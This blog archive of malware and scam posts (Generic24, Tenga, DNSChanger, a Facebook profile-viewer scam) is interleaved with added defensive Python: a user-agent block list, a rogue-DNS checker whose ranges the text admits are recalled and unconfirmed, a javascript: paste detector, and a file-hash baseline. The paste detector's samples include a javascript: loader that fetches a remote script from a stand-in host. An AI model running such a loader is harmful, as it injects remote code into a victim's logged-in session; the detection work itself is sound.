Blog Archives

Bork-Edition User Agent

Opera User Agent “Bork-Edition”

Have you seen Bork-edition user agent strings and wondered which browser sends them? Perhaps you have noticed that nearly all traffic to your site with Bork-edition in the user agent string is spam and hacking attempts. User agents containing Bork-edition are listed by at least one writer among the top 10 spam bots that must be blocked.

Several of these user agents look harmless at first glance, e.g. the user agent string Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
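As an added example (not code from the original post), here is a small Python scanner that reads web server access log lines in the common "combined" format, flags requests whose user agent contains a blocked marker such as Bork-edition, and counts hits per client IP so repeat offenders can be fed into a firewall or web-server deny list. The log lines, addresses and paths are constructed for the demonstration, and the marker list is an assumption meant to be extended from your own logs.

```python
import re
from collections import Counter

# Apache/nginx "combined" access log format:
# ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Substrings that mark a user agent as a known spam/scanner signature.
# "Bork-edition" is the one discussed above; extend the tuple from your own logs.
BLOCKED_UA_MARKERS = ("Bork-edition",)

# Constructed sample log lines (client addresses from the 203.0.113.0/24 documentation range).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Sep/2011:10:14:02 +0200] "GET /wp-login.php HTTP/1.1" 200 1853 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]"',
    '203.0.113.7 - - [20/Sep/2011:10:14:03 +0200] "POST /xmlrpc.php HTTP/1.1" 403 211 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]"',
    '203.0.113.42 - - [20/Sep/2011:10:15:10 +0200] "GET /2011/09/trojan-generic24/ HTTP/1.1" 200 9120 '
    '"http://www.google.com/search?q=generic24" "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/6.0"',
    'this line is not in combined format',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_blocked_ua(user_agent):
    """Case-insensitive substring match against the marker list."""
    ua = user_agent.lower()
    return any(marker.lower() in ua for marker in BLOCKED_UA_MARKERS)


def scan_log(lines):
    """Return (flagged entries, hit count per client IP, number of unparsable lines)."""
    flagged, per_ip, unparsed = [], Counter(), 0
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            unparsed += 1          # a burst of lines that will not parse is itself worth a look
            continue
        if is_blocked_ua(entry["ua"]):
            flagged.append(entry)
            per_ip[entry["ip"]] += 1
    return flagged, per_ip, unparsed


def ips_to_block(per_ip, threshold=2):
    """Client addresses that sent at least `threshold` flagged requests."""
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)


if __name__ == "__main__":
    flagged, per_ip, unparsed = scan_log(SAMPLE_LOG)
    for e in flagged:
        print(f"{e['ip']} {e['request']} -> {e['ua']}")
    print("block:", ips_to_block(per_ip), "| unparsed lines:", unparsed)
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines. The same marker match is what an Apache `SetEnvIfNoCase User-Agent "Bork-edition" bad_bot` rule does at request time (an assumption about your server, not something the post describes); the log scan is useful for finding the markers and the repeat addresses to put in such rules.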


Microsoft Security Essentials

Microsoft Security Essentials Under Microscope

A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from the most common threats? Can MSE compete with commercial security applications?

Over the next few months we will see.

Annoyed with Commercial AV Software.

I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too many system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps is able to detect every virus or piece of malware. An example is Trojan Generic 24, which seems to be detected only by AVG (and AVG doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.


Soccer Trojan from South Africa

Home Grown Malware?

Satellite image of South Africa (image from Wikipedia)

It looks like Trojan tvwjfm.exe (it goes by several other names too; see the list of known names and further information) could have originated from South Africa. At least the first reported infections came from this locale.

This makes a change to the norm where the largest percentage of new malware hails from the Asian Sub-Continent, although a tie-in to this region cannot be excluded.

This Trojan has not had a big impact; outbreaks so far seem to be limited, possibly deliberately targeting specific users. However, the few reported instances should not be taken to imply this Trojan is not dangerous – it is.

The file is unusually large for a Trojan, containing a package of other files. If run, it behaves like an application installer. Even if the install is cancelled, the Trojan installs other malware unknown to the PC user.

Soccer Trojan

I have decided to unofficially name this Trojan (as yet it has no official name) the Soccer Trojan. It presents itself with an icon of a soccer ball superimposed over a PC display, similar to the image on the left, which is clearly an attempt to encourage followers of this ball game to run the file.

Hopefully the Soccer Trojan will remain obscure, and not spread. Our vigilance is required at this early stage to interdict the malware before it gets the opportunity to ‘go viral’ and escape into the wild.

Rove Digital Botnet Take-Down

Cyber-Criminals Arrested, US Offices Closed

A cyber criminal network operated by Estonian company Rove Digital was taken down on November 8 2011 in a combined effort involving the FBI (Federal Bureau of Investigation of the USA) and the Estonian Police in co-operation with Trend Micro.

Rove Digital operated a botnet consisting of over four million (4 000 000) bots: computers infected with a class of malware known as ‘DNSChangers’. Infected systems typically have their DNS (Domain Name System) server settings changed to point at foreign IP addresses, so that the criminals’ servers answer every name lookup the victim makes.

Rove Digital appears on the surface to be a legitimate business, with established offices in Tartu, Estonia. It is the parent company of several other operations, including Esthost, Estdomains, Cernel, UkrTelegroup and many less well-known shell companies.

Rove Digital used a variety of criminal methods to earn money from the DNS changers. The cyber crime network had operated since 2006.
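The point of a DNSChanger is that the victim’s resolver addresses change silently, so the practical check is to read the configured resolvers and compare them with the rogue ranges. The following Python is an added example, not code from the original post, from Trend Micro or from the FBI: it pulls resolver addresses out of Windows `ipconfig /all` output and a Unix /etc/resolv.conf and tests them against the rogue resolver ranges published for the Operation Ghost Click take-down. The six ranges are reproduced from that publication as recalled here, so confirm them against the official list before relying on the check; the configuration excerpts are constructed.

```python
import ipaddress
import re

# Resolver ranges published by the FBI/DCWG for the Rove Digital rogue DNS servers.
# Reproduced as recalled from that publication: confirm against the official list
# before relying on them.
ROGUE_DNS_RANGES = [ipaddress.ip_network(n) for n in (
    "85.255.112.0/20", "67.210.0.0/20", "93.188.160.0/21",
    "77.67.83.0/24", "213.109.64.0/20", "64.28.176.0/20",
)]

IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")


def resolvers_from_ipconfig(text):
    """Collect DNS server addresses from Windows `ipconfig /all` output.

    The first address sits on the 'DNS Servers' line; further addresses follow on
    indented continuation lines holding nothing but an address. (An IPv6 resolver
    on a continuation line ends the run; IPv6 is not checked here.)
    """
    found, in_dns = [], False
    for line in text.splitlines():
        stripped = line.strip()
        if "DNS Servers" in line and ":" in line:
            found += IPV4_RE.findall(line.split(":", 1)[1])
            in_dns = True
        elif in_dns and IPV4_RE.fullmatch(stripped):
            found.append(stripped)
        else:
            in_dns = False
    return found


def resolvers_from_resolv_conf(text):
    """Collect nameserver addresses from a Unix /etc/resolv.conf."""
    return re.findall(r"^\s*nameserver\s+(\S+)", text, re.MULTILINE)


def rogue_resolvers(addresses):
    """Return (address, matching rogue range) for every resolver inside a rogue range."""
    hits = []
    for addr in addresses:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            continue                      # not an address at all: skip rather than crash
        for net in ROGUE_DNS_RANGES:
            if ip in net:
                hits.append((addr, str(net)))
                break
    return hits


# Constructed `ipconfig /all` excerpt from an infected machine (private LAN addresses).
SAMPLE_IPCONFIG = """\
Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : home.lan
   IPv4 Address. . . . . . . . . . . : 192.168.1.23
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 85.255.112.10
                                       85.255.112.11
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

# Constructed resolv.conf from a clean machine.
SAMPLE_RESOLV_CONF = """\
search home.lan
nameserver 192.168.1.1
nameserver 203.0.113.53
"""


def report(label, addresses):
    hits = rogue_resolvers(addresses)
    verdict = "ROGUE resolver(s) configured" if hits else "no rogue resolvers"
    return f"{label}: {addresses} -> {verdict} {hits}"


if __name__ == "__main__":
    print(report("ipconfig", resolvers_from_ipconfig(SAMPLE_IPCONFIG)))
    print(report("resolv.conf", resolvers_from_resolv_conf(SAMPLE_RESOLV_CONF)))
```

On a live machine, feed the function the text of `ipconfig /all` (Windows) or the contents of /etc/resolv.conf (Unix); a DNSChanger infection also commonly rewrites the DNS settings on a home router, so the router’s WAN DNS entries deserve the same comparison.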

Operation Ghost Click


Trojan Horse Generic24

Trojan Generic24 Information

This is a new virus in the wild. Trojan Horse Generic24.cgol is so new that it has not yet been given a common name. Generic24.cgol has already been seen in several versions. The Trend Micro Threat Library and the AVG library have as yet no information on this version.

Generic 24 is extremely dangerous.

At the time of writing this article (20 Sept 2011), and the one for Graphicline, no known anti-virus application is able to detect the initial infection by Generic24.cgol.

It is only discovered by heuristic scanning algorithms, after it has infected the user’s PC. Even AVG was unable to fully remove the virus; some components had to be removed manually.

An article on PC1News identifies the virus as an internet redirect virus, spreading fake AV software with a single click. However, I consider this information unreliable, contending there is more to the virus than just this. It definitely downloads other malware, including MsSQL database blockers and password blockers. I have not seen any other references to this version spreading FakeAV.

The virus, generic24.cgol, infected my Firefox browser and installed itself in the program folder, as well as in the Documents/Application Settings folders (and the Windows registry).

Sources for this Trojan

The generic24 trojan may infect your PC via an e-mail containing a link to a website from which the trojan downloads, or by clicking on a link to such a website.

It is possible generic24 may be sent deliberately by malicious persons via e-mail, and may contain an e-mail worm. There is too little definitive information available at present to do anything but advise extreme caution.

Generic24 Removal

For removal information please refer to graphicline.co.za (removing-trojan-generic24cgol).

IMPORTANT – CHANGE ALL ONLINE PASSWORDS

Completely remove trojan

Generic 24 Trojans are typically hacking related.

The trojan, or at least this version poses an active security risk. It may download other malware automatically, including malware files masquerading as Dc#.exe (# = various numbers) as well as a Linux/Unix database blocking virus.

Generic24.cgol may include a keystroke logger, and it definitely tries to actively prevent password changes.

One significant result of the infection was my website graphicline.co.za becoming corrupted. As a normal procedure after any keystroke logger or spyware problem, I change any recently used passwords. When I changed the passwords for my website login, I was still unaware the anti-virus scans had not fully removed the infection, and after logging out of the site, was unable to log back in again. (More on this) Eventually after several failed log-in attempts, the entire CMS website crashed…

NOTE: graphicline.co.za has been completely restored (database, CMS, and all active files) from a known clean backup stored remotely, lost content has been replaced manually, and the site is safe to visit.

Who Views Facebook Profile Scam is Back

Who is Viewing Your Facebook Profile Scam Back?

This scamming app appears to be making another return to Facebook! Noticing a surge in searches for information on this scam app, I spent some time the past few days doing some research into ‘Who is Viewing Your Facebook Profile’. My first discovery of this app is the subject of a post on this blog.

Who is Viewing Your Facebook Profile has made regular appearances on Facebook over the past few years in several guises. The one common factor is that it claims to tell Facebook members who is viewing their profile; then, after being allowed to connect to your Facebook account, it directs you to a website where you are required to subscribe to a cellphone subscription service, or to provide details about yourself, cellphone number and e-mail among them.

A more detailed report on my findings can be read at www.graphicline.co.za/viewing_facebook_profile

Who is Viewing Your Facebook Profile is a SCAM

The scam has at times offered a ‘link’ to a website (“Copy and paste this link in your browser…”).
WARNING: The supposed link is not a web address but JavaScript code; pasting it into your browser runs that code, and can result in your PC being infected with phishing malware.
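The warning above turns on one detail: what the scam asks you to paste into the address bar is not a link but a javascript: URL, which the browser executes as script rather than navigating anywhere. As an added example (not the author’s code, and nothing from Facebook), here is a Python check that applies the same leniency a browser applies to a pasted address, trimming surrounding spaces and control characters, dropping tabs and newlines inside it, and ignoring case, and then reports whether the result would run code rather than navigate. The sample strings are constructed.

```python
import re

# Schemes that execute code or render attacker-supplied content when entered
# in the address bar instead of navigating somewhere.
DANGEROUS_SCHEMES = {"javascript", "vbscript", "data"}

SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")
C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def normalise_pasted_link(text):
    """Apply the clean-up a browser performs on a pasted address: strip leading and
    trailing C0 control characters and spaces, then remove any tab, LF or CR left
    inside the string (so 'java<TAB>script:' still resolves to the javascript scheme)."""
    text = text.strip(C0_AND_SPACE)
    return re.sub(r"[\t\n\r]", "", text)


def scheme_of(text):
    """The scheme the browser would see, lower-cased, or None if there is none."""
    m = SCHEME_RE.match(normalise_pasted_link(text))
    return m.group(1).lower() if m else None


def is_dangerous_paste(text):
    return scheme_of(text) in DANGEROUS_SCHEMES


def classify(text):
    scheme = scheme_of(text)
    if scheme in DANGEROUS_SCHEMES:
        return f"DANGER: '{scheme}:' executes code or renders attacker content; do not paste"
    if scheme is None:
        return "no scheme: the browser would treat this as a search or a bare hostname"
    return f"ok: ordinary '{scheme}:' navigation"


# Constructed samples: the first mimics the shape of the scam's "link".
SAMPLES = [
    "javascript:(function(){var s=document.createElement('script');"
    "s.src='http://example.invalid/profile.js';document.body.appendChild(s);})()",
    "  JavaScript:void(document.title)  ",
    "java\tscript:alert('still javascript')",
    "\n\x01javascript:alert(1)",
    "data:text/html,<script>alert(1)</script>",
    "http://www.graphicline.co.za/viewing_facebook_profile",
    "www.example.com/javascript:not-a-scheme",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s[:40]), "->", classify(s))
```

The first sample shows why the scam works: the pasted script loads a remote file into the page you are logged into, so it runs with your Facebook session. Anything that starts with javascript: after this clean-up is never a link and should never be pasted.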

Anyone coming across the Who is Viewing Your Facebook Profile scam app should

  • Block it immediately on their Facebook page(s).
  • Not click on the link, whatever you do!
  • Report the app to Facebook

I would also appreciate instances of this app being reported using one of the methods on the Graphicline webpage mentioned above. WordPress, Facebook and Twitter account owners can also use the comment form below. The linking URL will not be made public; I do not want to propagate this scam further.

My intention is to spread the warning about  this scam.

Similar Apps to Who is Viewing Your Facebook Profile

Any app or website claiming to be able to provide information about viewers of your profile should also be reported. This kind of information is NOT available from Facebook. Any claim that an app or website can provide this information is false: it is a scam, a phishing attempt, and criminal. Any website, app or service that has managed to access this information has done so ILLEGALLY.

Stay vigilant to protect your information and yourself, and prevent the spread of these types of malware.

Bugged!

My computer got bugged

There, I admit it: a malware trojan managed to get into my system.

I’m a tech savvy and vigilant user of computing systems; I provide support to fix bugged systems.

I have firewalls and an anti-virus app installed and running, yet a trojan first identified around 2006 got through everything and went viral, replicating itself nearly 100 times before the anti-virus scanner decided to do what I paid good cash for and found the wretched thing.

The bug was identified as a variant of ‘Tenga.gen’.

Tenga.gen opens firewalls and downloads other spyware from the net, which will compromise personal banking and similar information. AVG does detect it, but only after it has been downloaded and attempts to run. The current version masquerades as Microsoft’s dotnetfx.exe and carries a digital signature which identifies it as a Microsoft application. It is not. This virus is a serious risk and will inject code into other executable files if allowed to remain on a Windows installation. The most vulnerable are users of Internet Explorer (so what’s new).
It also spreads via the LAN!

This is copied from a routine alert I send to colleagues and friends when identifying a new or re-appearing bug.

Fortunately no real damage was done. I got lucky. It only replicated itself around 100 times and infected 36 executable files. These were all within a shared folder, only used to keep copies of downloaded app installers, some of which dated back to 2007!
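A file infector of the Tenga kind alters executables in place, and a shared folder of old installers is exactly where that shows up late, because nothing normally rewrites those files. As an added example, not the author’s procedure or a feature of any AV product, here is a Python baseline check: it records a SHA-256 of every executable under a folder, saves the manifest as JSON, and on the next run reports which files changed, appeared or went missing. The demo() routine builds a scratch folder with constructed files, simulates an infected installer and a dropped fake dotnetfx.exe, and returns the report; the folder names and file contents are made up.

```python
import hashlib
import json
import os
import shutil
import tempfile

# Extensions worth baselining; file infectors target PE executables.
EXEC_EXTS = {".exe", ".dll", ".scr", ".com", ".msi"}


def sha256_file(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root, exts=EXEC_EXTS):
    """Map relative path -> {size, sha256} for every matching file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in exts:
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = {"size": os.path.getsize(full), "sha256": sha256_file(full)}
    return manifest


def save_manifest(manifest, path):
    with open(path, "w") as f:
        json.dump(manifest, f, indent=2, sort_keys=True)


def load_manifest(path):
    with open(path) as f:
        return json.load(f)


def compare_manifests(baseline, current):
    """Files whose hash changed, files not in the baseline, and files that vanished."""
    return {
        "changed": sorted(p for p in baseline
                          if p in current and baseline[p]["sha256"] != current[p]["sha256"]),
        "new": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Scratch-folder walkthrough with constructed files; returns the comparison report."""
    root = tempfile.mkdtemp(prefix="installers-")
    try:
        def write(rel, data):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)

        write("setup.exe", b"MZ\x90\x00 original installer bytes")
        write("tools/helper.dll", b"MZ\x90\x00 helper library")
        write("readme.txt", b"not an executable, ignored")
        manifest_path = os.path.join(root, "baseline.json")
        save_manifest(build_manifest(root), manifest_path)

        # Simulate what a file infector leaves behind: one installer grows a
        # code appendage, a fake dotnetfx.exe appears, and a DLL is gone.
        write("setup.exe", b"MZ\x90\x00 original installer bytes" + b"\x00" * 16 + b"injected")
        write("tools/dotnetfx.exe", b"MZ\x90\x00 not really from Microsoft")
        os.remove(os.path.join(root, "tools", "helper.dll"))

        return compare_manifests(load_manifest(manifest_path), build_manifest(root))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keep the baseline manifest somewhere the infected machine cannot rewrite it (a read-only share or offline copy); a manifest stored next to the files it describes can be replaced along with them. The check finds files that differ from when they were last known good, which is independent of whether any scanner has a signature for what changed them.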

I am also fairly certain it got in on the 28th, maybe 27th of this month, and ran after boot up in the morning of 29th….

The real damage was TIME: 6 hours to run a complete scan during normal productive time, several more hours looking for damaged files and deleting them, then running another scan (8.5 hours using HouseCall, the online scanner from Trend Micro), and lo, another couple of infected files the AVG scan ‘missed’.

I know I’ve had a go at AVG Internet Security before, after a colleague’s system was repeatedly infected over a 6 month period and required a complete re-format and re-installation no less than 3 times in that time frame. This is also the second time a bug has got into my system during the 9 months I have used the 2011 version of this app. The last time it was detected before it had done any damage, but only by running a manual full system scan; like this time, the internet security part of the thing failed miserably.

I can accept a new and unknown bug getting through heuristic scan algorithms, but a 6 YEAR OLD ONE. I am not impressed!

And evidently this is not the only AV app that does not stop this one getting into the system. Reading reports, it appears several other major-brand AV scanners also fail to detect it.

I am going back to Trend Micro products. I used PC-cillin for 4 years without a single instance of a bug getting in. I only switched because it is not the easiest app to get in South Africa. Yes, there is a local agent, but no means to purchase online. This is the 21st century; if the locals can’t provide it online, I will send my money to a company in another country that provides the service.